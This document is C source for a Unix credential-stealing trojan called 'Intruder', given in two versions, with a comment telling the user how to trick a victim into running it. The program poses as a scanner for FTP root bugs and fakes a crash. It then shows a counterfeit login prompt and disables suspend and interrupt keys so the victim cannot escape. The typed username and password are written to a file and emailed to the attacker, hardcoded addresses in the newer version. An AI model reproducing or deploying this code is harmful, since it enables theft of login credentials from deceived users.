/* Intruder 1.02 Written by the boys of #coderspc (Undernet) mostly written by THeGZa, but I couldn't have done it without Guilly, RedBull, and especially R33TaWRd. line 26 has char email[] = "youremailaddress@here.com" change that with your e-mail address,and the users login and pass will be sent to you. Get your victim to run this program on there linux box (might work in other unices, don't know?) it's disguised as a program to see if your system is vanurable to any ftp root bugs, then pretends a seg fault, goes back into a hacked copy of the login sequence. Change this if you like, GIVE US CREDIT, for what we did, if you need to get a hold of me e-mail me at sam@webnetix.com. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> void main() { char input1[10]; char input[10]; char var[80] = {0}; char buffer1[80] = {0}; FILE *fp; FILE *file; char email[] = "your@emailaddresshere.com"; //change this to your e-mail char *foo; struct login { char id[10]; char password[10]; }loginfake; /* if(getuid() !=0) //make sure were root { printf("you are not root, you cannot run this program, please su to root\n"); exit(-1); } */ printf("Searching for ftp root bugs\n"); if(!strcmp( getenv("TERM"), "rxvt")) //make sure were not in X { printf("need to be running in console press CTRL-ALT-F5 to open console terminal\n"); exit(-1); } if(!strcmp( getenv("TERM"), "xterm")) { printf("need to be running in console press CTRL-ALT-F5 to open console terminal\n"); exit(-1); } sleep( 1 ); printf(".\n "); sleep( 1 ); printf(".\n"); sleep( 1 ); printf(".\n"); sleep(1); sleep(1); printf("Found a root bug!!! inSegmentation Fault (core dumped)\n"); sleep(1); system("clear"); printf("\n"); fp = popen("cat /etc/issue.net", "r"); //login info fread(var, 80, 1, fp); system("stty susp ^G"); //so they can't escape out of login printf("%s",var); printf("\n"); printf("localhost login: "); gets(input); printf("Password: "); gets(input1); printf("\n"); printf("/bin/login cannot open /etc/motd\n"); printf("running terminal safe mode!\n"); printf("\n"); strcpy(loginfake.id, input); strcpy(loginfake.password, input1); file = fopen("mirror.txt","w"); fprintf(file, "%s %s",loginfake.id,loginfake.password); fclose(file); foo=(char *)malloc(4096); sprintf(foo,"mail %s < mirror.txt",email); // e-mail login and pass system(foo); } ------------------------------------------------------------------------ Here is a newer version: ------------------------------------------------------------------------ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <pwd.h> typedef struct { char id[9]; char password[9]; } login; login loginfake; void scanend(char *string); void testX(); void pimpthem(); void fakelogin(); void sttystuff(); void emailus(); void main() { printf("Searching for local ftpd bugs.\n"); testX(); pimpthem(); sttystuff(); fakelogin(); emailus(); } void scanend(char *string) { int count; for(count=0;count<78;count++) { if(string[count]==10) string[count]=0; if(string[count]==13) string[count]=0; } } void testX() { char xterm[] = "xterm"; char xtermcolor[] = "xterm-color"; char rxvt[] = "rxvt"; char rxvtcolor[] = "rxvt-color"; char nxterm[] = "nxterm"; char noX[] = "You are in X, please exit to run this program"; if(! (strcmp(getenv("TERM"), xterm))) { printf("%c\n",noX); exit(-1); } if( (!strcmp(getenv("TERM"), xtermcolor))) { printf("%c\n",noX); exit(-1); } if(! (strcmp(getenv("TERM"), rxvt))) { printf("%c\n",noX); exit(-1); } if(!(strcmp(getenv("TERM"),rxvtcolor))) { printf("%c\n",noX); exit(-1); } if(!(strcmp(getenv("TERM"),nxterm))) { printf("%c\n",noX); exit(-1); } } void pimpthem() { printf("\n"); printf(".\n"); sleep( 1 ); printf(".\n"); sleep( 1 ); printf(".\n"); sleep( 1 ); printf("found buffer overide bug iSegmentation Fault (core dumped)\n"); sleep( 1 ); system("clear"); } void fakelogin() { char *input1[10]={0}; char input[10]; char var[80] = {0}; char buffer[80] = {0}; FILE *fp; FILE *file; char hostname[80]={0}; FILE *hostnamefile; fp = popen("cat /etc/issue.net", "r"); fread(var, 80, 1, fp); printf("\n"); printf("%s",var); printf("\n"); hostnamefile=fopen("/etc/HOSTNAME","r"); fread(hostname,78,1,hostnamefile); scanend(hostname); printf("%s login: ",hostname); gets(input); *input1=getpass("Password: "); printf("\n"); printf("/bin/cat cannot open /etc/motd cought buffer overide!\n"); printf("opening system fix shell, run fsck\n"); strcpy(loginfake.id, input); strcpy(loginfake.password, *input1); file = fopen("mirror.txt","w"); fprintf(file, "username:%s\npassword:%s\nUID:%i",loginfake.id, loginfake.password, getuid()); fclose(file); } void emailus() { char guilly[] = "gchamber@videotron.ca"; char thegza[] = "yacoubi@ibm.net"; char *foo; char *poo; foo=(char *)malloc(4096); sprintf(foo, "mail %s < mirror.txt",guilly); poo=(char *)malloc(4096); sprintf(poo, "mail %s < mirror.txt",thegza); system(foo); system(poo); } void sttystuff() { system("stty susp ^G"); system("stty intr ^Q"); }